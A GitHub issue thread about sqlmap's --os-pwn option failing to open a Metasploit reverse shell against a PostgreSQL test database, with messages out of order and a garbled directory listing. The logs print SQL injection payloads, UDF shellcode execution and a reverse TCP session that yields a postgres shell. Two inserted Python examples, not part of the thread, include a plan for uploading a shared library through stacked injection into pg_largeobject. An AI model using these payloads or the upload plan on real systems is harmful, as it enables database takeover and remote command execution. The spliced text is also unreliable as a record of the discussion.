Open ljesparis opened 8 years ago
It didn't work. Not sure what's strange here?
On Sep 21, 2016 21:20, "Leonardo Esparis" notifications@github.com wrote:
hi,
When I'm trying to use Metasploit with sqlmap, a timeout is raised. Any suggestion?
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/sqlmapproject/sqlmap/issues/2173, or mute the thread https://github.com/notifications/unsubscribe-auth/AA4P0x2XLuL59oqhtS3afgEg48lKPSFEks5qsYNagaJpZM4KDLbJ .
Why did it not work? I mean, I'm learning about sqlmap and I want to know when it will work. I'm using the sqlmapproject testenv..
Are you sure that it is a 32-bit environment? Also, please make a quick test on that same listening machine whether it is possible to connect to some arbitrary port in the first place. Google for netcat server/client.
Bye
On Sep 21, 2016 21:25, "Leonardo Esparis" notifications@github.com wrote:
Why did it not work? I mean, I'm learning about sqlmap and I want to know when it will work. I'm using the sqlmapproject testenv..
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/sqlmapproject/sqlmap/issues/2173#issuecomment-248716214, or mute the thread https://github.com/notifications/unsubscribe-auth/AA4P0-a1AR1s7e4ub38nq8-gmveBKTdPks5qsYSUgaJpZM4KDLbJ .
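The netcat test suggested above, written out as an added example (it is not part of this thread and not sqlmap's code): a listener that stands in for the Metasploit handler ("Started reverse TCP handler on LHOST:LPORT") and a probe run from the database-host side that reports whether the TCP handshake completed, was refused, or got no answer. The addresses and ports are constructed; run on a single machine it talks to itself over loopback, so substitute the real LHOST/LPORT when testing between two hosts.

```python
"""Reverse-TCP reachability check. Added example, not sqlmap's code; all
hosts and ports below are constructed for illustration."""
import socket
import threading


def start_listener(bind_addr="127.0.0.1", port=0, accept_timeout=5.0):
    """Attacker side: listen like the Metasploit handler would. port=0 lets
    the OS pick a free port. Returns (bound_port, result_dict, thread); the
    thread records the peer that connected, if any, in result_dict['peer']."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, port))
    srv.listen(1)
    srv.settimeout(accept_timeout)
    bound_port = srv.getsockname()[1]
    result = {"peer": None}

    def _accept():
        try:
            conn, peer = srv.accept()
            result["peer"] = peer
            conn.close()
        except socket.timeout:
            pass  # nobody connected back within accept_timeout
        finally:
            srv.close()

    t = threading.Thread(target=_accept, daemon=True)
    t.start()
    return bound_port, result, t


def probe(host, port, timeout=3.0):
    """Database-host side: try to complete a TCP handshake to host:port.
    'open'     - handshake completed, the handler is reachable
    'refused'  - RST came back: host reachable, nothing listening on port
    'filtered' - no answer before timeout: firewall/NAT/route in the way"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "refused"
    except (socket.timeout, OSError):
        return "filtered"
    finally:
        s.close()


def closed_port(bind_addr="127.0.0.1"):
    """Pick a port that nothing is listening on, to show the 'refused' case."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((bind_addr, 0))
    p = s.getsockname()[1]
    s.close()
    return p


if __name__ == "__main__":
    port, result, t = start_listener()
    print("listener 127.0.0.1:%d -> %s" % (port, probe("127.0.0.1", port)))
    t.join()
    print("peer seen by listener:", result["peer"])
    print("closed port -> %s" % probe("127.0.0.1", closed_port()))
```

A 'refused' result means the path is fine and nothing is bound on LPORT; 'filtered' is what a firewall or NAT between the database host and the handler looks like, and is one of the ways to end up at sqlmap's "timeout occurred while attempting to open a remote session" (the other, as this thread goes on to show, is the shellcode never running on the database host at all).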
Both computers can communicate with netcat and the problem persists.
# python sqlmap.py -u "http://debiandev/sqlmap/pgsql/get_brackets.php?id=1" --technique=S --os-pwn --batch
(sqlmap ASCII banner) {1.0.9.24#dev} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 12:52:19
[12:52:19] [WARNING] you did not provide the local path where Metasploit Framework is installed
[12:52:19] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s)
[12:52:19] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path
[12:52:19] [INFO] resuming back-end DBMS 'postgresql'
[12:52:19] [INFO] testing connection to the target URL
[12:52:19] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: id=1);SELECT PG_SLEEP(5)--
---
[12:52:19] [INFO] the back-end DBMS is PostgreSQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[12:52:19] [INFO] fingerprinting the back-end DBMS operating system
[12:52:19] [INFO] the back-end DBMS operating system is Linux
[12:52:19] [INFO] testing if current user is DBA
[12:52:19] [INFO] detecting back-end DBMS version from its banner
[12:52:19] [INFO] resumed: 8.3.9
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[12:52:19] [INFO] checking if UDF 'sys_bineval' already exist
[12:52:19] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N] N
[12:52:24] [INFO] checking if UDF 'sys_exec' already exist
[12:52:24] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] N
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 1
[12:52:29] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.146.1' (detected)] 192.168.146.1
which local port number do you want to use? [7122] 7122
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 1
[12:52:29] [INFO] creation in progress ..... done
[12:52:34] [INFO] running Metasploit Framework command line interface locally, please wait..
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v4.11.8-dev-a030179 ]
+ -- --=[ 1518 exploits - 877 auxiliary - 259 post ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => thread
LPORT => 7122
LHOST => 192.168.146.1
[*] Started reverse TCP handler on 192.168.146.1:7122
[*] Starting the payload handler...
[12:52:40] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[12:52:40] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[*] Sending stage (36 bytes) to 192.168.146.130
[*] Command shell session 1 opened (192.168.146.1:7122 -> 192.168.146.130:14030) at 2016-09-23 12:52:40 +0200
pwd
/var/lib/postgresql/8.3/main
whoami
postgres
Can you please check the /tmp folder on the target machine itself to see whether there are any new files after you run --os-pwn, e.g.:
debian-5:/tmp# ll
total 212
-rw-rw---- 1 informix informix 1749 Jun 1 11:47 blduser.out.2130
-rw-rw---- 1 informix informix 6365 Jun 1 11:46 bldutil.2130
-rw-rw---- 1 informix informix 184475 Jun 1 11:45 buildsmi.2130
-rw-rw---- 1 informix informix 137 Jun 1 11:22 buildsmi.2130.drop
-rw-r--r-- 1 postgres postgres 5124 Jun 3 10:26 libsrfxw.so
Please pull the latest revision and retry. There is a possibility that it will work :). Reduced the size(s) of the uploaded .so libraries; size constraints regarding file upload size are the standard issue with PostgreSQL SQLi.
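On that size constraint, an added example (not sqlmap's code and not from this thread) of why the .so size matters for a PostgreSQL stacked-queries upload. It plans the upload the way a stacked injection has to do it: the library is written into pg_largeobject one 2048-byte page per injected INSERT and then lo_export()ed to a path like the /tmp/lib*.so above, so every page is a separate HTTP request whose query string carries two hex characters per byte of file plus URL encoding. The statement shapes, the hex encoding, the OID, the output path and the target URL are illustrative choices (sqlmap's own statements and encoding may differ); the 8190-byte figure is Apache's default LimitRequestLine.

```python
"""Plan a PostgreSQL large-object upload as a stacked-query injection must do
it, and measure the GET request each page needs. Added example, not sqlmap's
code; statement shapes, OID, path and URL are illustrative."""
import math
from urllib.parse import quote

LOBLKSIZE = 2048                  # pg_largeobject page size: BLCKSZ (8192) / 4
APACHE_LIMIT_REQUEST_LINE = 8190  # Apache default cap on "GET <url> HTTP/1.1"


def plan_upload(blob, loid, remote_path):
    """Stacked statements that store `blob` under large object `loid`, one
    page per INSERT, then export it to `remote_path`. Writing pg_largeobject
    directly needs superuser, which is why --os-pwn first checks whether the
    current user is DBA. Hex is one of the encodings decode() accepts."""
    stmts = [
        "SELECT lo_create(%d)" % loid,
        "DELETE FROM pg_largeobject WHERE loid=%d" % loid,
    ]
    for pageno, off in enumerate(range(0, len(blob), LOBLKSIZE)):
        page = blob[off:off + LOBLKSIZE]
        stmts.append(
            "INSERT INTO pg_largeobject (loid, pageno, data) "
            "VALUES (%d, %d, decode('%s', 'hex'))" % (loid, pageno, page.hex())
        )
    stmts.append("SELECT lo_export(%d, '%s')" % (loid, remote_path))
    return stmts


def request_line_lengths(stmts, base_url, param="id", prefix="1);", suffix="--"):
    """Bytes of the request line for each statement once it is injected as
    id=1);<statement>-- (the stacked-queries payload shape in this thread)
    and URL-encoded: every space, quote, comma and parenthesis costs 3 bytes."""
    lengths = []
    for stmt in stmts:
        url = "%s?%s=%s" % (base_url, param, quote(prefix + stmt + suffix, safe=""))
        lengths.append(len("GET %s HTTP/1.1" % url))
    return lengths


def too_long(stmts, base_url, limit=APACHE_LIMIT_REQUEST_LINE):
    """Indices of statements whose request line the web server would reject."""
    return [i for i, n in enumerate(request_line_lengths(stmts, base_url)) if n > limit]


def summary(blob, loid, remote_path, base_url, limit=APACHE_LIMIT_REQUEST_LINE):
    stmts = plan_upload(blob, loid, remote_path)
    lengths = request_line_lengths(stmts, base_url)
    return {
        "bytes": len(blob),
        "pages": math.ceil(len(blob) / LOBLKSIZE),
        "requests": len(stmts),
        "longest_request_line": max(lengths),
        "over_limit": too_long(stmts, base_url, limit),
    }


# Constructed stand-in for a 6152-byte library (the size of the libshchw.so
# listed later in the thread); the bytes themselves do not matter here.
SAMPLE_SO = bytes(range(256)) * 24 + b"\x00" * 8
SAMPLE_URL = "http://debiandev/sqlmap/pgsql/get_brackets.php"

if __name__ == "__main__":
    print(summary(SAMPLE_SO, 16384, "/tmp/libexample.so", SAMPLE_URL))
    # a server that capped request lines at 4 KB would reject every full page
    print(too_long(plan_upload(SAMPLE_SO, 16384, "/tmp/libexample.so"), SAMPLE_URL, limit=4000))
```

For the 6152-byte sample the plan is seven requests (create, clear, three full pages, one 8-byte page, export), the full pages each needing a request line of roughly 4.3 KB; a proxy, WAF or server with a tighter request-line limit would drop exactly those, which is what shrinking the library buys.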
drwxrwxrwt 7 root root 4096 sep 23 13:51 24 00:17 ./
drwxr-xr-x 24 root root 4096 sep 23 13:51 22 14:30 ../
-rw-r--r-- 1 postgres postgres 6152 sep 23 13:51 23 23:58 libshchw.so
-rwxr--r-- 1 postgres postgres 3516 sep 23 13:51 24 00:07 tmpseuiih*
(sqlmap ASCII banner) {1.0.9.32#dev} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:13:41
[17:13:41] [INFO] resuming back-end DBMS 'postgresql'
[17:13:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1) AND 7969=7969 AND (4138=4138
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: id=1) AND 8237=CAST((CHR(113)||CHR(112)||CHR(122)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (8237=8237) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC) AND (9870=9870
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: id=1);SELECT PG_SLEEP(5)--
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: id=1) AND 1926=(SELECT 1926 FROM PG_SLEEP(5)) AND (5118=5118
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1) UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(112)||CHR(122)||CHR(107)||CHR(113))||(CHR(69)||CHR(113)||CHR(84)||CHR(111)||CHR(89)||CHR(84)||CHR(74)||CHR(121)||CHR(88)||CHR(99)||CHR(88)||CHR(75)||CHR(82)||CHR(111)||CHR(106)||CHR(84)||CHR(70)||CHR(89)||CHR(122)||CHR(112)||CHR(89)||CHR(109)||CHR(106)||CHR(88)||CHR(69)||CHR(86)||CHR(87)||CHR(68)||CHR(122)||CHR(104)||CHR(121)||CHR(106)||CHR(114)||CHR(80)||CHR(78)||CHR(113)||CHR(100)||CHR(99)||CHR(104)||CHR(85))||(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113))-- VXgp
---
[17:13:41] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: PostgreSQL
[17:13:41] [INFO] fingerprinting the back-end DBMS operating system
[17:13:41] [INFO] the back-end DBMS operating system is Linux
[17:13:41] [INFO] testing if current user is DBA
[17:13:41] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[17:13:42] [INFO] checking if UDF 'sys_bineval' already exist
UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N]
[17:13:48] [INFO] checking if UDF 'sys_exec' already exist
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N]
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 1
[17:13:52] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.2.10' (detected)]
which local port number do you want to use? [22816]
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 1
[17:14:09] [INFO] creation in progress ........... done
[17:14:20] [INFO] running Metasploit Framework command line interface locally, please wait..
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v4.12.25-dev ]
+ -- --=[ 1577 exploits - 901 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => thread
LPORT => 22816
LHOST => 192.168.2.10
[*] Started reverse TCP handler on 192.168.2.10:22816
[*] Starting the payload handler...
[17:14:46] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[17:14:47] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[17:19:21] [CRITICAL] timeout occurred while attempting to open a remote session
Just downloaded one TurnKey 64-bit machine with PostgreSQL and it seems that you are right. I'll need to fix the support for --os-pwn against 64-bit PostgreSQL. Please give me some time as I'll be away for the weekend.
p.s. sqlmap's upload of those .so files is working perfectly (related UDF functions are working even when calling them manually)
okay .. =P
Just a quick update. The situation seems to be more complicated than I thought. As Bernardo originally implemented that part, it seems that support for the 64-bit version has never been done in the first place. For example, shellcodeexec works perfectly in a 32-bit environment because of things like Metasploit's x86/alpha_mixed, which gives you an alphanumeric payload (perfect for placing it into shellcodeexec's argument) to be used in the 32-bit case, but there is no similar encoder for x64. Also, if using the 32-bit version of shellcodeexec in a 64-bit environment, 32-bit OS libraries have to be preinstalled (e.g. ia32-libs) by the administrator himself. Anyway, give me some time.
hi,
When I'm trying to use Metasploit with sqlmap, a timeout is raised. Any suggestion?
$ ./sqlmap -u "http://192.168.2.10/testenv/pgsql/get_brackets.php?id=1" --os-pwn --msf-path /path/to/metasploit
[15:10:54] [INFO] testing connection to the target URL
[15:10:54] [INFO] heuristics detected web page charset 'ascii'
[15:10:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[15:10:55] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "(" LINE 1: SELECT * FROM users WHERE id=(1(.,),').,') OFFSET 0 LIMIT 1 ^'
[15:10:55] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'PostgreSQL')
[15:10:55] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "'MYkyOC<'" LINE 1: SELECT * FROM users WHERE id=(1'MYkyOC<'">bxcrbJ) OFFSET 0 L... ^'
[15:10:55] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting attacks
[15:10:55] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n]
[15:10:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:10:56] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[15:11:07] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[15:11:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:11:07] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[15:11:17] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "20" LINE 1: ...T * FROM users WHERE id=(1);SELECT (CASE WHEN (80 20) THEN (... ^'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 38 HTTP(s) requests:
---
Parameter: id (GET)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: id=1);SELECT PG_SLEEP(5)--
---
[15:11:37] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.45, Apache 2.2.22
back-end DBMS: PostgreSQL
[15:11:37] [INFO] fingerprinting the back-end DBMS operating system
[15:11:37] [WARNING] parsed DBMS error message: 'ERROR: table "sqlmapfile" does not exist'
[15:11:37] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[15:11:37] [INFO] the back-end DBMS operating system is Linux
[15:11:37] [WARNING] parsed DBMS error message: 'ERROR: table "sqlmapfilehex" does not exist'
[15:11:37] [INFO] testing if current user is DBA
[15:11:42] [INFO] detecting back-end DBMS version from its banner
[15:11:42] [INFO] retrieved: 9.1.23
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[15:13:33] [INFO] checking if UDF 'sys_bineval' already exist
[15:13:33] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N]
[15:13:46] [INFO] checking if UDF 'sys_exec' already exist
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N]
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
[15:13:57] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
what is the local address? [Enter for '192.168.2.10' (detected)]
which local port number do you want to use? [38748]
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
[15:14:02] [INFO] creation in progress .......... done
[15:14:12] [INFO] running Metasploit Framework command line interface locally, please wait..
(Metasploit ASCII banner)
=[ metasploit v4.12.25-dev ]
+ -- --=[ 1577 exploits - 901 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => thread
LPORT => 38748
LHOST => 192.168.2.10
[*] Started reverse TCP handler on 192.168.2.10:38748
[*] Starting the payload handler...
[15:14:37] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[15:19:13] [CRITICAL] timeout occurred while attempting to open a remote session
D=